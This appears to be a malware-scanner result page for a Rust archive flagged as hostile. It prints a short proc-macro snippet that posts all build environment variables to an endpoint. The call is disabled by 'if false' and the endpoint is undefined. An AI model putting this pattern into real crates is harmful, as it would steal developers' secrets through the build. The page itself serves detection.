Hostile 100% Download

rust-proc_macro.tgz

Proc macro exfiltrates environment secrets

Cargo proc macro exfiltrates build environmentRust proc macro exfiltrates build environment
SHA-256291a7039503eebf931aba0006cdf8340592106e98e2f81350503cb19269a7e09

Evidence

Uses the Rust ureq HTTP client lines 1–3
1use proc_macro::{TokenStream};
2#[proc_macro]
3pub fn derive(item:TokenStream)->TokenStream{if false{ureq::post(endpoint).send_json(std::env::vars());}item}

No evidence locations were recorded for this file. Raw result

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.